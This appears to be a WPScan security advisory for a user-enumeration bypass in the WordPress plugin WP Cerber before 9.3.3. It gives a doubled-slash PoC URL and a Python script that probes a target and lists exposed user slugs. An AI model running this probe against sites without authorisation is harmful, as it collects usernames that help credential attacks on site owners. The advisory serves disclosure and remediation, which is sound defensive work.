wpvulndb | Abdul Muneeb | WPVDB-ID: A8C6B077-FF93-4C7B-970F-3BE4D7971AA5
Dec 12, 2022 - 12:00 a.m.

WP Cerber < 9.3.3 - User Enumeration Bypass via Rest API

Abdul Muneeb
wpscan.com
Tags: wordpress, cerber, user enumeration, rest api, subdirectory, bypass, security plugin

EPSS: 0.001 (Percentile: 40.5%)

The plugin (versions before 9.3.3) does not properly block access to the REST API users endpoint when the blog is installed in a subdirectory, which could allow attackers to bypass the "Block access to users' data via REST API" hardening restriction and enumerate users.

PoC

With the "Block access to users' data via REST API" setting enabled (wp-admin/admin.php?page=cerber-security&tab=hardening), the users endpoint is still reachable on a blog installed in a subdirectory when the request path carries a doubled slash before wp-json:

https://example.com/subdir//wp-json/wp/v2/users
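The following checker is an added example, not code from WPScan, the advisory author or the Cerber plugin. It takes the PoC above as its only input from the page: it builds the normal users-endpoint URL and the doubled-slash variant for a blog root such as the hypothetical https://example.com/subdir, fetches both, and reports "bypass" when the normal path is blocked but the PoC path still lists users. The response-parsing and verdict functions run offline against constructed sample responses shaped like WordPress core's users endpoint; the target URL, the User-Agent string and the sample bodies are this example's own assumptions.

```python
"""Probe for the subdirectory double-slash bypass of Cerber's REST users block.

Added example, not code from WPScan or the WP Cerber plugin. Only the PoC path
shape (a doubled slash before wp-json) comes from the advisory; the target URL,
response samples and classification below are assumptions of this example.
"""
import json
import sys
import urllib.error
import urllib.request
from urllib.parse import urlsplit, urlunsplit

USERS_ROUTE = "wp-json/wp/v2/users"


def candidate_urls(base_url: str) -> dict:
    """Return the normal users endpoint and the doubled-slash PoC variant.

    base_url is the blog root including its subdirectory, e.g.
    https://example.com/subdir (hypothetical target).
    """
    parts = urlsplit(base_url)
    path = parts.path.rstrip("/")
    normal = urlunsplit(parts._replace(path=f"{path}/{USERS_ROUTE}"))
    bypass = urlunsplit(parts._replace(path=f"{path}//{USERS_ROUTE}"))
    return {"normal": normal, "bypass": bypass}


def users_listed(status: int, body: bytes) -> list:
    """Return the user slugs exposed by a users-endpoint response, or [].

    A blocked request (non-200 status, or a JSON error object instead of an
    array) yields an empty list; a successful listing is a JSON array of user
    objects that carry a "slug" field.
    """
    if status != 200:
        return []
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if not isinstance(data, list):
        return []
    return [u["slug"] for u in data if isinstance(u, dict) and "slug" in u]


def fetch(url: str, timeout: float = 10.0) -> tuple:
    """GET a URL and return (status, body); HTTP error responses are returned, not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "cerber-rest-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as e:
        return e.code, e.read()


def assess(results: dict) -> str:
    """Classify a target from {variant: (status, body)} pairs.

    'bypass'   normal path is blocked but the PoC path lists users (vulnerable)
    'exposed'  the normal path already lists users (hardening not in effect)
    'blocked'  neither path lists users
    """
    normal = users_listed(*results["normal"])
    bypass = users_listed(*results["bypass"])
    if bypass and not normal:
        return "bypass"
    if normal:
        return "exposed"
    return "blocked"


# Constructed sample responses (not captured traffic): a users listing shaped
# like WordPress core's endpoint output, and a generic forbidden error object.
SAMPLE_LISTING = json.dumps([
    {"id": 1, "name": "Admin", "slug": "admin"},
    {"id": 2, "name": "Editor", "slug": "editor"},
]).encode()
SAMPLE_FORBIDDEN = json.dumps(
    {"code": "rest_forbidden", "message": "Forbidden", "data": {"status": 403}}
).encode()


def main(argv):
    if len(argv) != 2:
        print(f"usage: {argv[0]} https://example.com/subdir", file=sys.stderr)
        return 2
    urls = candidate_urls(argv[1])
    results = {name: fetch(url) for name, url in urls.items()}
    for name, (status, body) in results.items():
        print(f"{name:7} {status} {urls[name]} -> {users_listed(status, body)}")
    print("verdict:", assess(results))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against a blog root that includes the subdirectory; a "bypass" verdict reproduces the advisory, while "exposed" means the hardening option is not blocking the normal path either, so the result says nothing about this bug. The remediation in both cases is the same as the advisory implies: update WP Cerber to 9.3.3 or later rather than relying on a path-string block.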
